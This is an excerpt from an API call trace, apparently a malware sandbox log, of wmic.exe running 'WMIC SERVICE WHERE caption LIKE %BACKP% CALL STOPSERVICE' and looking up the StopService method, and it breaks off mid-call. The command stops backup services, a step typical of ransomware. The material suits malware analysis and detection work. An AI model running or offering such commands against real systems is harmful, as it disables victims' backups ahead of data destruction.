SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.509] SysStringLen (param_1="wmiclimofformat") returned 0xf [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="TABLE") returned 0x5 [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.510] SysStringLen (param_1="TABLE") returned 0x5 [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.510] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.510] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.510] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0109.510] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0109.510] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0109.511] FreeThreadedDOMDocument:IUnknown:Release (This=0xc945a8) returned 0x0 [0109.511] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE" [0109.511] memcpy_s (in: _Destination=0xca8040, _DestinationSize=0x7e, _Source=0xb81588, _SourceSize=0x7a | out: _Destination=0xca8040) returned 0x0 [0109.511] GetLocalTime (in: lpSystemTime=0xb2fc08 | out: lpSystemTime=0xb2fc08*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x2, wMilliseconds=0x17b)) [0109.511] _vsnwprintf (in: _Buffer=0xca80c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xb2fbe8 | out: _Buffer="04-15-2018T10:09:02") returned 19 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString="SERVICE") returned 7 [0109.512] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString="WHERE") returned 5 [0109.512] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0109.512] memmove_s (in: _Destination=0xca2c78, _DestinationSize=0x4, _Source=0xca2c68, _SourceSize=0x4 | out: _Destination=0xca2c78) returned 0x0 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0109.512] _wcsicmp (_String1="'caption LIKE '%BACKP%''", _String2="\"NULL\"") returned 5 [0109.512] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0109.512] lstrlenW (lpString="'caption LIKE '%BACKP%''") returned 24 [0109.512] memmove_s (in: _Destination=0xca7ed8, _DestinationSize=0x8, _Source=0xca2c78, _SourceSize=0x8 | out: _Destination=0xca7ed8) returned 0x0 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString="CALL") returned 4 [0109.512] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0109.512] memmove_s (in: _Destination=0xca7f80, _DestinationSize=0xc, _Source=0xca7ed8, _SourceSize=0xc | out: _Destination=0xca7f80) returned 0x0 [0109.512] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE") returned 57 [0109.512] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.512] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0109.512] memmove_s (in: _Destination=0xca2298, _DestinationSize=0x10, _Source=0xca7f80, _SourceSize=0x10 | out: _Destination=0xca2298) returned 0x0 [0109.512] lstrlenW (lpString="QUIT") returned 4 [0109.512] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0109.513] lstrlenW (lpString="EXIT") returned 4 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0109.513] WbemLocator:IUnknown:AddRef (This=0xb86c10) returned 0x2 [0109.513] lstrlenW (lpString="/") returned 1 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0109.513] lstrlenW (lpString="-") returned 1 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0109.513] lstrlenW (lpString="CLASS") returned 5 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0109.513] lstrlenW (lpString="PATH") returned 4 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0109.513] lstrlenW (lpString="CONTEXT") returned 7 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] lstrlenW (lpString="SERVICE") returned 7 [0109.513] GetCurrentThreadId () returned 0xdc4 [0109.513] ??0CHString@@QAE@XZ () returned 0xb2fb5c [0109.513] WbemLocator:IWbemLocator:ConnectServer (in: This=0xb86c10, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xbb0988) returned 0x0 [0109.535] CoSetProxyBlanket (pProxy=0xbb0988, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.535] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.535] GetCurrentThreadId () returned 0xdc4 [0109.535] ??0CHString@@QAE@XZ () returned 0xb2fb04 [0109.535] SysStringLen (param_1="root\\cli") returned 0x8 [0109.535] SysStringLen (param_1="\\") returned 0x1 [0109.535] SysStringLen (param_1="root\\cli\\") returned 0x9 [0109.535] SysStringLen (param_1="ms_409") returned 0x6 [0109.535] WbemLocator:IWbemLocator:ConnectServer (in: This=0xb86c10, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xbb0b18) returned 0x0 [0109.542] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.542] GetCurrentThreadId () returned 0xdc4 [0109.542] ??0CHString@@QAE@XZ () returned 0xb2fb60 [0109.542] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0109.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xca8a00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0109.542] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0109.542] SysStringLen (param_1="SERVICE") returned 0x7 [0109.543] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0109.543] SysStringLen (param_1="'") returned 0x1 [0109.543] IWbemServices:GetObject (in: This=0xbb0988, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xb2fb5c*=0x0, ppCallResult=0x0 | out: ppObject=0xb2fb5c*=0xbd5348, ppCallResult=0x0) returned 0x0 [0109.549] IWbemClassObject:Get (in: This=0xbd5348, wszName="Target", lFlags=0, pVal=0xb2fb34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fb34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.549] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.549] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0109.549] IWbemClassObject:Get (in: This=0xbd5348, wszName="PWhere", lFlags=0, pVal=0xb2fb34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fb34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.549] lstrlenW (lpString="WHERE Name='#'") returned 14 [0109.549] lstrlenW (lpString="WHERE Name='#'") returned 14 [0109.549] IWbemClassObject:Get (in: This=0xbd5348, wszName="Connection", lFlags=0, pVal=0xb2fb34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fb34*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbd5708, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.549] IUnknown:QueryInterface (in: This=0xbd5708, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xb2fb50 | out: ppvObject=0xb2fb50*=0xbd5708) returned 0x0 [0109.550] GetCurrentThreadId () returned 0xdc4 [0109.550] ??0CHString@@QAE@XZ () returned 0xb2fad0 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="Namespace", lFlags=0, pVal=0xb2fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0109.550] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="Locale", lFlags=0, pVal=0xb2fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbb71ac, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] lstrlenW (lpString="ms_409") returned 6 [0109.550] lstrlenW (lpString="ms_409") returned 6 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="User", lFlags=0, pVal=0xb2fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbb71ac, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="Password", lFlags=0, pVal=0xb2fab4*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="Server", lFlags=0, pVal=0xb2fab4*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] lstrlenW (lpString=".") returned 1 [0109.550] lstrlenW (lpString=".") returned 1 [0109.550] IWbemClassObject:Get (in: This=0xbd5708, wszName="Authority", lFlags=0, pVal=0xb2fab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbb71ac, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fab4*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.550] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.550] IUnknown:Release (This=0xbd5708) returned 0x1 [0109.550] GetCurrentThreadId () returned 0xdc4 [0109.550] ??0CHString@@QAE@XZ () returned 0xb2fac0 [0109.551] IWbemClassObject:Get (in: This=0xbd5348, wszName="__RELPATH", lFlags=0, pVal=0xb2faa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2faa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.551] GetCurrentThreadId () returned 0xdc4 [0109.551] ??0CHString@@QAE@XZ () returned 0xb2fa3c [0109.551] ??0CHString@@QAE@PBG@Z () returned 0xb2fa38 [0109.551] ??0CHString@@QAE@ABV0@@Z () returned 0xb2f9b8 [0109.551] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0109.551] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xca8a00 [0109.551] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0109.551] ?Left@CHString@@QBE?AV1@H@Z () returned 0xb2f9b0 [0109.551] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xb2f9b4 [0109.551] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xb2fa38 [0109.551] ??1CHString@@QAE@XZ () returned 0x1 [0109.551] ??1CHString@@QAE@XZ () returned 0x1 [0109.551] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xb2f9ac [0109.551] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xb2f9b8 [0109.551] ??1CHString@@QAE@XZ () returned 0x1 [0109.551] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xca8a60 [0109.551] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0109.551] ?Left@CHString@@QBE?AV1@H@Z () returned 0xb2f9b0 [0109.551] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xb2f9b4 [0109.551] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xb2fa38 [0109.551] ??1CHString@@QAE@XZ () returned 0x1 [0109.551] ??1CHString@@QAE@XZ () returned 0x1 [0109.551] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xb2f9ac [0109.551] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xb2f9b8 [0109.551] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.551] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0109.551] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.551] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0109.551] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0109.551] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0109.551] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0109.551] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0109.551] SysStringLen (param_1="\"") returned 0x1 [0109.552] IWbemServices:GetObject (in: This=0xbb0b18, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xb2fa48*=0x0, ppCallResult=0x0 | out: ppObject=0xb2fa48*=0xbd5ae8, ppCallResult=0x0) returned 0x0 [0109.553] IWbemClassObject:Get (in: This=0xbd5ae8, wszName="Text", lFlags=0, pVal=0xb2fa14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2fa14*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbbf3b0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xbb3480, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.553] SafeArrayGetLBound (in: psa=0xbbf3b0, nDim=0x1, plLbound=0xb2fa24 | out: plLbound=0xb2fa24) returned 0x0 [0109.553] SafeArrayGetUBound (in: psa=0xbbf3b0, nDim=0x1, plUbound=0xb2fa28 | out: plUbound=0xb2fa28) returned 0x0 [0109.553] SafeArrayGetElement (in: psa=0xbbf3b0, rgIndices=0xb2fa40, pv=0xb2fa2c | out: pv=0xb2fa2c) returned 0x0 [0109.553] SysStringLen (param_1="Service application management. ") returned 0x20 [0109.553] IUnknown:Release (This=0xbd5ae8) returned 0x0 [0109.553] ??1CHString@@QAE@XZ () returned 0x1 [0109.553] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.553] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.553] lstrlenW (lpString="Service application management. ") returned 32 [0109.553] lstrlenW (lpString="Service application management. ") returned 32 [0109.553] IUnknown:Release (This=0xbd5348) returned 0x0 [0109.554] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.554] lstrlenW (lpString="PATH") returned 4 [0109.554] lstrlenW (lpString="WHERE") returned 5 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0109.554] lstrlenW (lpString="WHERE") returned 5 [0109.554] lstrlenW (lpString="WHERE") returned 5 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0109.554] lstrlenW (lpString="/") returned 1 [0109.554] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%BACKP%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0109.554] lstrlenW (lpString="-") returned 1 [0109.554] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%BACKP%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0109.554] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0109.554] lstrlenW (lpString="caption LIKE '%BACKP%'") returned 22 [0109.554] lstrlenW (lpString="/") returned 1 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0109.554] lstrlenW (lpString="-") returned 1 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] lstrlenW (lpString="GET") returned 3 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0109.554] lstrlenW (lpString="LIST") returned 4 [0109.554] lstrlenW (lpString="CALL") returned 4 [0109.554] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0109.554] lstrlenW (lpString="SET") returned 3 [0109.555] lstrlenW (lpString="CALL") returned 4 [0109.555] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0109.555] lstrlenW (lpString="CREATE") returned 6 [0109.555] lstrlenW (lpString="CALL") returned 4 [0109.555] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0109.555] lstrlenW (lpString="CALL") returned 4 [0109.555] lstrlenW (lpString="CALL") returned 4 [0109.555] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0109.555] lstrlenW (lpString="/") returned 1 [0109.555] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.555] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0109.555] lstrlenW (lpString="-") returned 1 [0109.555] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.555] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0109.555] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.555] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.555] GetCurrentThreadId () returned 0xdc4 [0109.555] ??0CHString@@QAE@XZ () returned 0xb2f2cc [0109.555] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0109.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xca8a88, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0109.555] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0109.555] SysStringLen (param_1="SERVICE") returned 0x7 [0109.555] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0109.555] SysStringLen (param_1="'") returned 0x1 [0109.555] IWbemServices:GetObject (in: This=0xbb0988, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xb2f2a8*=0x0, ppCallResult=0x0 | out: ppObject=0xb2f2a8*=0xbd5348, ppCallResult=0x0) returned 0x0 [0109.560] lstrlenW (lpString="CALL") returned 4 [0109.560] lstrlenW (lpString="CALL") returned 4 [0109.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0109.561] IWbemClassObject:Get (in: This=0xbd5348, wszName="Verbs", lFlags=0, pVal=0xb2f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f260*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xbbf200*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xbbf130, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.562] SafeArrayGetLBound (in: psa=0xbbf200, nDim=0x1, plLbound=0xb2f270 | out: plLbound=0xb2f270) returned 0x0 [0109.562] SafeArrayGetUBound (in: psa=0xbbf200, nDim=0x1, plUbound=0xb2f278 | out: plUbound=0xb2f278) returned 0x0 [0109.562] SafeArrayGetElement (in: psa=0xbbf200, rgIndices=0xb2f280, pv=0xb2f2b4 | out: pv=0xb2f2b4) returned 0x0 [0109.562] IWbemClassObject:Get (in: This=0xbd6d10, wszName="Name", lFlags=0, pVal=0xb2f250*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f250*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.562] lstrlenW (lpString="StartService") returned 12 [0109.562] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0109.562] IUnknown:Release (This=0xbd6d10) returned 0x1 [0109.562] SafeArrayGetElement (in: psa=0xbbf200, rgIndices=0xb2f280, pv=0xb2f2b4 | out: pv=0xb2f2b4) returned 0x0 [0109.562] IWbemClassObject:Get (in: This=0xbd7240, wszName="Name", lFlags=0, pVal=0xb2f250*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f250*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.562] lstrlenW (lpString="StopService") returned 11 [0109.562] lstrlenW (lpString="STOPSERVICE") returned 11 [0109.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0109.562] GetCurrentThreadId () returned 0xdc4 [0109.562] ??0CHString@@QAE@XZ () returned 0xb2f0cc [0109.562] IWbemClassObject:Get (in: This=0xbd7240, wszName="Description", lFlags=0, pVal=0xb2f09c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f09c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.562] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.562] IWbemClassObject:Get (in: This=0xbd7240, wszName="Parameters", lFlags=0, pVal=0xb2f240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f240*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.563] IWbemClassObject:Get (in: This=0xbd7240, wszName="VerbType", lFlags=0, pVal=0xb2f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb2f1d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.563] IWbemClassObject:Get (in: This=0xbd7240, wszName="Derivation", 